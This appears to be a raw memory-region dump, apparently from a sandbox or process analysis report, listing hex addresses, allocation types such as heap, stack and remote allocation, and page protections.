page read and write
9D00000
trusted library allocation
page execute and read and write
8090000
trusted library allocation
page read and write
5568000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
8090000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
47D0000
heap
page read and write
8DE0000
trusted library allocation
page read and write
3945000
heap
page read and write
7DC0000
trusted library allocation
page read and write
A7E58FF000
stack
page read and write
8DF0000
trusted library allocation
page read and write
45BF000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
5564000
direct allocation
page read and write
B012000
trusted library allocation
page read and write
790000
remote allocation
page read and write
2340000
unkown
page read and write
9CB0000
trusted library allocation
page read and write
8E15000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
77F000
stack
page read and write
9033000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
1B54EE8B000
heap
page read and write
8ED2000
trusted library allocation
page read and write
54E0000
heap
page read and write
72C000
stack
page read and write
8E00000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
AFD0000
trusted library allocation
page read and write
CA0000
trusted library allocation
page read and write
A8F0000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
7250000
trusted library allocation
page read and write
5310000
heap
page read and write
CA1487E000
stack
page read and write
2230F465000
heap
page read and write
99F000
stack
page read and write
8D30000
trusted library allocation
page read and write
7DC5000
trusted library allocation
page read and write
7344000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
A40000
heap
page read and write
8EA0000
trusted library allocation
page read and write
6CF0000
trusted library allocation
page read and write
ED9C3FF000
stack
page read and write
8E10000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
14CD5868000
heap
page read and write
8CC0000
trusted library allocation
page read and write
6F10000
trusted library allocation
page execute and read and write
553A000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
1A330F40000
trusted library allocation
page read and write
C1D000
heap
page read and write
1B5507E0000
remote allocation
page read and write
8EE0000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
7DD0000
unkown
page read and write
9C30000
trusted library allocation
page read and write
4976000
trusted library allocation
page execute and read and write
B44C000
trusted library allocation
page read and write
984000
heap
page read and write
9EB0000
trusted library allocation
page read and write
8D9B000
trusted library allocation
page read and write
8FFE000
stack
page read and write
8E2F000
trusted library allocation
page read and write
C9C000
stack
page read and write
EF45FE000
stack
page read and write
8EE0000
trusted library allocation
page read and write
1A32C002000
heap
page read and write
8E90000
trusted library allocation
page read and write
7EE0000
unkown
page read and write
14CD586E000
heap
page read and write
8D90000
trusted library allocation
page read and write
2230F3E0000
heap
page read and write
8E10000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
4690000
heap
page read and write
8ED0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
28EA53E0000
heap
page read and write
28EA5F3A000
heap
page read and write
9EA0000
trusted library allocation
page read and write
696000
heap
page read and write
7EFC000
trusted library allocation
page read and write
5061000
trusted library allocation
page read and write
14CD5863000
heap
page read and write
6B60000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
1A32C159000
heap
page read and write
FD0D9FF000
stack
page read and write
6F60000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8FB0000
trusted library allocation
page read and write
5E6E0000
unkown
page readonly
5053000
trusted library allocation
page read and write
8D00000
trusted library allocation
page read and write
7F26000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
1671783F000
heap
page read and write
A900000
trusted library allocation
page read and write
809E000
trusted library allocation
page read and write
8DF0000
unkown
page read and write
A8EE000
stack
page read and write
8F00000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
AB70000
trusted library allocation
page read and write
1FA26E29000
heap
page read and write
8DE0000
trusted library allocation
page read and write
A900000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
6CB0000
trusted library allocation
page read and write
8E15000
trusted library allocation
page read and write
9EE5000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
92A000
heap
page read and write
8DD0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
B80000
remote allocation
page read and write
91C0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
4987000
trusted library allocation
page execute and read and write
1FA26E4D000
heap
page read and write
8EA0000
trusted library allocation
page read and write
9C20000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
AD60000
trusted library allocation
page read and write
C5EE4FB000
stack
page read and write
7DC8000
unkown
page read and write
6BE0000
trusted library allocation
page read and write
72E1000
trusted library allocation
page read and write
90A0000
trusted library allocation
page read and write
2340000
unkown
page read and write
6B80000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
DED14FD000
stack
page read and write
8E10000
trusted library allocation
page read and write
AB80000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
5430000
direct allocation
page read and write
95FD000
unkown
page read and write
8E90000
trusted library allocation
page read and write
2AE3000
heap
page read and write
8EA0000
trusted library allocation
page read and write
877C000
stack
page read and write
7DC5000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
C03000
heap
page read and write
8D60000
trusted library allocation
page read and write
6BA0000
trusted library allocation
page read and write
B8C000
heap
page read and write
7EF0000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
9C73000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
6D00000
trusted library allocation
page read and write
9C40000
trusted library allocation
page execute and read and write
8E10000
trusted library allocation
page read and write
4576000
trusted library allocation
page read and write
AB51000
trusted library allocation
page read and write
28DD4FF0000
heap
page read and write
55D3000
heap
page read and write
7DD0000
trusted library allocation
page read and write
49A0000
heap
page read and write
6BF0000
trusted library allocation
page read and write
4953000
trusted library allocation
page execute and read and write
2230F469000
heap
page read and write
9051000
trusted library allocation
page read and write
2CA3A229000
heap
page read and write
8F30000
trusted library allocation
page read and write
6D4000
heap
page read and write
AB40000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
984000
heap
page read and write
8F00000
trusted library allocation
page read and write
6F20000
trusted library allocation
page read and write
8EA5000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
9EB0000
trusted library allocation
page read and write
1A32B824000
heap
page read and write
14CD5829000
heap
page read and write
28EA5613000
heap
page read and write
94BE000
unkown
page read and write
6D00000
trusted library allocation
page read and write
5161000
heap
page read and write
1A33105E000
heap
page read and write
1A32B89F000
heap
page read and write
992000
heap
page read and write
980000
heap
page read and write
1B54EF02000
heap
page read and write
8F30000
trusted library allocation
page read and write
6DC0000
trusted library allocation
page read and write
C20000
remote allocation
page read and write
9C80000
trusted library allocation
page read and write
C20000
remote allocation
page read and write
8F30000
trusted library allocation
page read and write
32A4000
heap
page read and write
92E000
stack
page read and write
5E6E1000
unkown
page execute read
802C000
direct allocation
page read and write
2BC0000
direct allocation
page execute and read and write
7ED0000
trusted library allocation
page read and write
63E000
stack
page read and write
9D10000
trusted library allocation
page execute and read and write
9CB0000
trusted library allocation
page read and write
8090000
trusted library allocation
page read and write
8CB0000
unkown
page read and write
28EA5450000
heap
page read and write
BB6000
heap
page read and write
2916000
heap
page read and write
AD40000
trusted library allocation
page read and write
14CD5844000
heap
page read and write
7DD0000
trusted library allocation
page read and write
9EF0000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
7DD0000
trusted library allocation
page read and write
7DD6000
unkown
page read and write
9D10000
trusted library allocation
page read and write
4394000
heap
page read and write
AB40000
trusted library allocation
page read and write
8010000
direct allocation
page read and write
9C88000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
E00000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
96E000
stack
page read and write
790000
remote allocation
page read and write
A7E5BFB000
stack
page read and write
125FCB02000
heap
page read and write
2230F43C000
heap
page read and write
54E6000
trusted library allocation
page read and write
49A7000
heap
page read and write
45A5000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
7DD7000
trusted library allocation
page read and write
9AE000
stack
page read and write
8F30000
trusted library allocation
page read and write
6E10000
trusted library allocation
page read and write
FD0000
heap
page read and write
6B60000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
7F90000
direct allocation
page read and write
8E70000
trusted library allocation
page read and write
7EF0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
29A5C090000
heap
page read and write
9C80000
trusted library allocation
page read and write
A8F0000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
AB40000
trusted library allocation
page execute and read and write
A8B000
stack
page read and write
8F70000
unkown
page read and write
7DD0000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
1A3310B0000
heap
page read and write
559C000
heap
page read and write
153A57B000
stack
page read and write
8F30000
trusted library allocation
page read and write
FD0D7FF000
stack
page read and write
6DE0000
trusted library allocation
page read and write
1A330E14000
trusted library allocation
page read and write
104E000
stack
page read and write
AB80000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
73E0000
trusted library allocation
page execute and read and write
8EB0000
trusted library allocation
page read and write
8090000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
4D93000
heap
page read and write
C0000
remote allocation
page read and write
14CD584D000
heap
page read and write
3280000
trusted library allocation
page read and write
7F10000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
2CA3A1F0000
remote allocation
page read and write
8CB0000
trusted library allocation
page read and write
5256000
trusted library allocation
page read and write
45D2000
trusted library allocation
page read and write
7ED5000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
125FCA78000
heap
page read and write
8CB0000
trusted library allocation
page read and write
7E1000
direct allocation
page read and write
8D90000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
B40B000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
5564000
direct allocation
page read and write
9C60000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
BFD000
heap
page read and write
6D6D000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
498B000
trusted library allocation
page execute and read and write
14CD5831000
heap
page read and write
8DA0000
trusted library allocation
page read and write
58C000
stack
page read and write
43C0000
trusted library allocation
page read and write
55F3000
heap
page read and write
8D75000
trusted library allocation
page read and write
AC30000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
AB10000
unkown
page read and write
8F70000
unkown
page read and write
F9D000
stack
page read and write
8D90000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
5D80000
heap
page read and write
5E6F6000
unkown
page readonly
8E90000
trusted library allocation
page read and write
8DF0000
trusted library allocation
page read and write
8D50000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
7F30000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
DED117E000
stack
page read and write
EB1000
heap
page read and write
8EE0000
unkown
page read and write
AB20000
trusted library allocation
page read and write
7DD3000
unkown
page read and write
8CD0000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
A948000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8D10000
unkown
page read and write
5638000
trusted library allocation
page read and write
3555000
heap
page read and write
73B0000
trusted library allocation
page read and write
1200000
heap
page read and write
1A32C8F0000
trusted library section
page readonly
8CC0000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
AB3A000
trusted library allocation
page read and write
9250000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
512000
unkown
page read and write
8F30000
trusted library allocation
page read and write
14CD5847000
heap
page read and write
8E10000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
AC70000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
1B54ED50000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
B0BB000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
1B5507E0000
remote allocation
page read and write
8EF0000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
28EA56C3000
heap
page read and write
7DC0000
trusted library allocation
page read and write
B441000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
37DB57F000
stack
page read and write
7390000
trusted library allocation
page read and write
90E9D77000
stack
page read and write
830000
direct allocation
page read and write
125FCA13000
heap
page read and write
8E80000
trusted library allocation
page read and write
A80000
unkown
page execute and read and write
8EA0000
trusted library allocation
page read and write
B413000
trusted library allocation
page read and write
55A0000
heap
page read and write
8E20000
trusted library allocation
page read and write
14CD585A000
heap
page read and write
7DC5000
trusted library allocation
page read and write
8FC0000
unkown
page read and write
8E15000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
1B550802000
trusted library allocation
page read and write
401000
unkown
page execute read
4985000
trusted library allocation
page execute and read and write
1FA26E47000
heap
page read and write
8CC0000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
E60000
heap
page read and write
7E50000
trusted library allocation
page read and write
28DD5279000
heap
page read and write
4963000
trusted library allocation
page read and write
790000
remote allocation
page read and write
8D90000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
53E0000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
73C0000
trusted library allocation
page read and write
73BC000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
2BB8000
heap
page read and write
23C0000
trusted library allocation
page read and write
9090000
unkown
page read and write
8ED0000
trusted library allocation
page read and write
6B20000
direct allocation
page read and write
2230F508000
heap
page read and write
2960000
heap
page read and write
BB5000
heap
page read and write
8F70000
unkown
page read and write
8CC0000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
946000
heap
page read and write
C08000
heap
page read and write
6BE0000
trusted library allocation
page read and write
8CC5000
trusted library allocation
page read and write
8E00000
trusted library allocation
page read and write
901F000
trusted library allocation
page read and write
4750000
unkown
page read and write
AB30000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
9C20000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
4FC000
stack
page read and write
B4F5000
trusted library allocation
page read and write
5609000
heap
page read and write
73D0000
trusted library allocation
page read and write
8001000
direct allocation
page read and write
AD30000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
ACA0000
trusted library allocation
page read and write
C70A000
stack
page read and write
7DC0000
trusted library allocation
page read and write
AB70000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
B47F000
trusted library allocation
page read and write
93FD000
unkown
page read and write
8E15000
trusted library allocation
page read and write
8D80000
unkown
page read and write
8D90000
trusted library allocation
page read and write
8D00000
trusted library allocation
page read and write
6B90000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
8CE0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
14CD586C000
heap
page read and write
9080000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
950000
heap
page read and write
8CB0000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
9210000
trusted library allocation
page execute and read and write
9C30000
trusted library allocation
page read and write
14CD55F0000
heap
page read and write
8E10000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
54E0000
heap
page read and write
8CB0000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
BB5000
heap
page read and write
55C1000
trusted library allocation
page read and write
748000
heap
page read and write
8C60000
trusted library allocation
page read and write
1A32C015000
heap
page read and write
8090000
unkown
page read and write
9060000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
A960000
trusted library allocation
page read and write
7EF0000
trusted library allocation
page read and write
8090000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
7DD5000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
6CD0000
trusted library allocation
page read and write
4390000
heap
page read and write
1A3310ED000
heap
page read and write
8A8000
direct allocation
page read and write
9165000
unkown
page read and write
9CB0000
trusted library allocation
page read and write
9EA0000
trusted library allocation
page read and write
9C60000
trusted library allocation
page read and write
2CA3A130000
heap
page read and write
16717873000
heap
page read and write
AB50000
trusted library allocation
page read and write
9EF0000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
125FCA70000
heap
page read and write
1B54EF00000
heap
page read and write
8DA0000
trusted library allocation
page read and write
14CD585C000
heap
page read and write
32A4000
heap
page read and write
9150000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
AB80000
trusted library allocation
page read and write
8E30000
trusted library allocation
page execute and read and write
8FD0000
trusted library allocation
page read and write
8090000
trusted library allocation
page read and write
AB60000
trusted library allocation
page execute and read and write
8E30000
trusted library allocation
page read and write
8F40000
trusted library allocation
page execute and read and write
9CA0000
trusted library allocation
page read and write
9270000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
7F0000
direct allocation
page read and write
AB40000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
73D2000
trusted library allocation
page read and write
55F8000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
1A331102000
heap
page read and write
8CB0000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
355E000
stack
page read and write
4AB0000
trusted library allocation
page read and write
8EB5000
unkown
page read and write
8F30000
trusted library allocation
page read and write
AB60000
trusted library allocation
page read and write
620000
remote allocation
page read and write
8E10000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
9C70000
trusted library allocation
page read and write
5212000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
8E15000
trusted library allocation
page read and write
1A32B8FD000
heap
page read and write
8E80000
trusted library allocation
page read and write
A3D000
stack
page read and write
1FA26F08000
heap
page read and write
6D40000
trusted library allocation
page read and write
8E00000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
1A330F50000
remote allocation
page read and write
9C80000
trusted library allocation
page read and write
B19C000
trusted library allocation
page read and write
E10000
heap
page read and write
8DE0000
trusted library allocation
page read and write
8C88000
trusted library allocation
page read and write
1FA26BA0000
heap
page read and write
8CE0000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
2BB0000
heap
page read and write
7DC7000
trusted library allocation
page read and write
1B54EE00000
heap
page read and write
6D60000
trusted library allocation
page read and write
5E6FD000
unkown
page read and write
9C50000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
A941000
trusted library allocation
page read and write
4571000
trusted library allocation
page read and write
E68000
heap
page read and write
8D80000
trusted library allocation
page read and write
9EB0000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
6CE0000
direct allocation
page read and write
9020000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
6CC0000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
556F000
direct allocation
page read and write
8E10000
trusted library allocation
page read and write
2230F45C000
heap
page read and write
AC10000
trusted library allocation
page read and write
4970000
trusted library allocation
page read and write
55E7000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
598000
heap
page read and write
90F0000
unkown
page read and write
5532000
trusted library allocation
page read and write
8CD0000
trusted library allocation
page read and write
E6E000
stack
page read and write
2640000
heap
page read and write
AD81000
trusted library allocation
page read and write
B3C9000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
14CD5760000
trusted library allocation
page read and write
2A3F000
heap
page read and write
8E15000
trusted library allocation
page read and write
8CF0000
trusted library allocation
page read and write
495D000
trusted library allocation
page execute and read and write
8EC0000
trusted library allocation
page read and write
C25000
heap
page read and write
8E20000
trusted library allocation
page read and write
B99000
heap
page read and write
8E20000
trusted library allocation
page read and write
73B0000
trusted library allocation
page read and write
AB50000
trusted library allocation
page read and write
30000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
8D65000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
8F4E000
trusted library allocation
page read and write
33E0000
heap
page read and write
8E30000
trusted library allocation
page read and write
8DF0000
trusted library allocation
page read and write
C20000
remote allocation
page read and write
9CB0000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
2FD8000
stack
page read and write
8E00000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
72AE000
trusted library allocation
page read and write
8ED1000
trusted library allocation
page read and write
5BC0000
direct allocation
page execute and read and write
7340000
trusted library allocation
page read and write
95BE000
unkown
page read and write
73D0000
trusted library allocation
page read and write
BAE000
heap
page read and write
9CA0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
14CD5859000
heap
page read and write
8CE0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
8E12000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
9C70000
trusted library allocation
page read and write
B025000
trusted library allocation
page read and write
1B54EE59000
heap
page read and write
8DA0000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
1A32B7E0000
trusted library allocation
page read and write
1A32B893000
heap
page read and write
7360000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
4954000
trusted library allocation
page read and write
2560000
heap
page read and write
984000
heap
page read and write
28EA56CD000
heap
page read and write
1FA26E8E000
heap
page read and write
8F70000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
8F90000
unkown
page read and write
7ED0000
unkown
page read and write
7EE0000
unkown
page read and write
8CC5000
trusted library allocation
page read and write
4537000
heap
page read and write
8D80000
trusted library allocation
page read and write
6CFD000
trusted library allocation
page read and write
B36B000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
984000
heap
page read and write
8CB0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
FD0000
remote allocation
page read and write
A940000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
9165000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
461A000
trusted library allocation
page read and write
85E0000
direct allocation
page read and write
29D7000
heap
page read and write
AB40000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
8F40000
unkown
page read and write
2BBE000
heap
page read and write
2230F502000
heap
page read and write
8CB0000
trusted library allocation
page read and write
1A32B88F000
heap
page read and write
4A40000
trusted library allocation
page readonly
910000
heap
page read and write
8CC0000
trusted library allocation
page read and write
5606000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
C0000
remote allocation
page read and write
8E00000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8FE6000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
55A6000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
8CB0000
trusted library allocation
page read and write
A90000
trusted library section
page read and write
4F73000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
2ADE000
stack
page read and write
8D80000
trusted library allocation
page read and write
1A330DF8000
trusted library allocation
page read and write
8E40000
unkown
page read and write
C5EE3FF000
stack
page read and write
8E80000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
39A0000
heap
page read and write
8D10000
trusted library allocation
page read and write
1A330DF0000
trusted library allocation
page read and write
9C70000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
1A32C118000
heap
page read and write
2B2F000
stack
page read and write
37DB17F000
stack
page read and write
91F0000
trusted library allocation
page read and write
37DB37F000
stack
page read and write
8FE0000
unkown
page read and write
14CD583D000
heap
page read and write
525E000
trusted library allocation
page read and write
7368000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
B97000
heap
page read and write
8CD5000
trusted library allocation
page read and write
14CD5600000
heap
page read and write
28EA567E000
heap
page read and write
29A5C23C000
heap
page read and write
9CE0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
5420000
heap
page read and write
28EA5600000
heap
page read and write
8D90000
trusted library allocation
page read and write
72A6000
trusted library allocation
page read and write
91F6000
trusted library allocation
page read and write
8D00000
trusted library allocation
page read and write
6D4000
heap
page read and write
44EE000
stack
page read and write
8ED0000
trusted library allocation
page read and write
88BF000
stack
page read and write
660000
trusted library allocation
page read and write
125FD202000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
14CD587C000
heap
page read and write
AB50000
trusted library allocation
page read and write
6C30000
trusted library allocation
page read and write
90F0000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
6CE0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
55F3000
heap
page read and write
8CB0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
1B54EF13000
heap
page read and write
9CF0000
trusted library allocation
page read and write
AE7000
heap
page read and write
8E20000
trusted library allocation
page read and write
A7E5A7C000
stack
page read and write
1A32C102000
heap
page read and write
8CB0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
C70000
heap
page read and write
1A32B874000
heap
page read and write
7DC9000
unkown
page read and write
9030000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page execute and read and write
7292000
trusted library allocation
page read and write
45AB000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
9EB0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
967000
heap
page read and write
6B02000
direct allocation
page read and write
8D85000
unkown
page read and write
7340000
trusted library allocation
page read and write
6D3D000
trusted library allocation
page read and write
4582000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
B4D000
heap
page read and write
C11000
heap
page read and write
39A8000
heap
page read and write
518C000
trusted library allocation
page read and write
9CF7000
trusted library allocation
page read and write
EF3F5B000
stack
page read and write
2230F463000
heap
page read and write
8E10000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
4693000
heap
page read and write
9CB0000
trusted library allocation
page read and write
57E0000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
1A32B7F0000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
4B70000
heap
page read and write
B3E8000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
6CF0000
trusted library allocation
page read and write
3820000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
8E45000
trusted library allocation
page read and write
7E5F000
trusted library allocation
page read and write
EF0000
heap
page read and write
8CB0000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
E30000
heap
page read and write
8E80000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
AEEB000
trusted library allocation
page read and write
8D40000
trusted library allocation
page read and write
32A4000
heap
page read and write
8F20000
trusted library allocation
page execute and read and write
8E00000
trusted library allocation
page execute and read and write
6E30000
trusted library allocation
page read and write
7DD6000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
2330000
unkown
page readonly
FD0D0FB000
stack
page read and write
9030000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
98A000
heap
page read and write
7DD4000
trusted library allocation
page read and write
125FCA5C000
heap
page read and write
6B80000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
ABA0000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
5B61000
trusted library allocation
page read and write
8F18000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
1FA26E71000
heap
page read and write
4FDE000
stack
page read and write
8F30000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
